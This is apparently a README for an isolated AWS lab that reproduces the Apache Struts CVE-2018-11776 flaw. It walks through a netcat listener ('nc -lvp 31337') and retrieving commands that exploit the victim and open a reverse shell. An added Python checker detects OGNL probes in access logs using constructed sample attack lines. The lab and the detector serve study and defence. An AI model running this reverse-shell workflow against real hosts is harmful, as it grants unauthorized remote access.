Spins up an isolated test environment for experimentation with Apache Struts vulnerability CVE-2018-11776.
To bring up the test environment, run the following command:

```sh
aws cloudformation create-stack \
  --template-body file://cfn.yml \
  --stack-name <STACK_NAME> \
  --parameters \
    ParameterKey=Ec2KeyName,ParameterValue=<KEY_NAME> \
    ParameterKey=Linux2Ami,ParameterValue=<AMAZON_LINUX2_AMI_ID>
```
- Retrieve the victim and attacker IPs, then open an SSH session to each:

  ```sh
  # Victim public IP
  aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
    --query 'Stacks[0].Outputs[?OutputKey==`VictimPublicIp`].OutputValue' --output text

  # Attacker public IP
  aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
    --query 'Stacks[0].Outputs[?OutputKey==`AttackerPublicIp`].OutputValue' --output text
  ```

- Retrieve the command used to check whether the victim is vulnerable, then execute it in the attacker session:

  ```sh
  aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
    --query 'Stacks[0].Outputs[?OutputKey==`CheckVuln`].OutputValue' --output text
  ```

- (Optional) Retrieve the command used to see whether the exploit works, then execute it in the attacker session:

  ```sh
  aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
    --query 'Stacks[0].Outputs[?OutputKey==`RunExploit`].OutputValue' --output text
  ```

- Set up the attacker machine to listen for reverse tunnels:

  ```sh
  nc -lvp 31337
  ```

- Retrieve the command used to force the victim to initiate a reverse tunnel to the attacker:

  ```sh
  aws cloudformation describe-stacks --stack-name=<STACK_NAME> \
    --query 'Stacks[0].Outputs[?OutputKey==`RunReverseShell`].OutputValue' --output text
  ```

- Open an additional SSH session to the attacker machine and run the command retrieved in the previous step.

- Return to the reverse tunnel session. You now have CLI access to the victim machine.
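The exploit traffic this lab sends at the victim is visible in the victim's web server access log, and checking that a detection actually fires there is a sensible thing to do before tearing the stack down. The following is an added example, not part of this README or of the referenced PoC: a small Python checker that parses access-log lines in the common Apache/Tomcat "combined" format (assumed; adjust `LOG_RE` if the victim logs differently) and flags requests whose URL path, after percent-decoding, contains an OGNL expression marker (`${` or `%{`), which is what a CVE-2018-11776 namespace probe looks like on the wire. The log lines are constructed for the example and are not captured lab traffic.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/Tomcat "combined" access-log format; not real
# traffic from the lab. Two lines carry a URL-encoded OGNL expression marker in a
# path segment, one of them double-encoded; the last line has "%24" only in the
# query string and must not be flagged.
SAMPLE_LOG = """\
10.0.1.5 - - [22/Aug/2018:10:15:01 +0000] "GET /struts2-showcase/index.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.1.9 - - [22/Aug/2018:10:15:07 +0000] "GET /struts2-showcase/%24%7B1%2B1%7D/index.action HTTP/1.1" 302 0 "-" "curl/7.61.0"
10.0.1.9 - - [22/Aug/2018:10:15:09 +0000] "GET /struts2-showcase/%25%7B2*3%7D/index.action HTTP/1.1" 302 0 "-" "curl/7.61.0"
10.0.1.5 - - [22/Aug/2018:10:16:00 +0000] "POST /struts2-showcase/login.action?user=a%24b HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# Assumed "combined" log format: client ip, ident, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# OGNL expressions in Struts are written ${...} or %{...}.
OGNL_MARKER = re.compile(r'[$%]\{')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so that double-encoded markers are caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_ognl_probes(log_text):
    """Return one dict per request whose URL path carries an OGNL expression marker."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line; skip rather than guess
        # CVE-2018-11776 is triggered through the namespace, which Struts derives from
        # the URL path, so only the path is inspected and the query string is dropped.
        path = decode_fully(m.group('target').split('?', 1)[0])
        if OGNL_MARKER.search(path):
            hits.append({
                'ip': m.group('ip'),
                'timestamp': m.group('ts'),
                'method': m.group('method'),
                'path': path,
                'status': int(m.group('status')),
            })
    return hits


def summarize_by_source(hits):
    """Count flagged requests per client IP for a quick triage view."""
    counts = {}
    for h in hits:
        counts[h['ip']] = counts.get(h['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    found = find_ognl_probes(SAMPLE_LOG)
    for h in found:
        print(f"{h['timestamp']} {h['ip']} {h['method']} {h['path']} -> {h['status']}")
    print(summarize_by_source(found))
```

Run it against the victim's real access log by replacing `SAMPLE_LOG` with the file contents; the decode loop is what keeps a `%25%7B`-style double encoding from slipping past a naive substring match.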
To destroy the test environment, issue the following command:

```sh
aws cloudformation delete-stack --stack-name <STACK_NAME>
```

This demo is based on hook-s3c's CVE-2018-11776-Python-PoC code.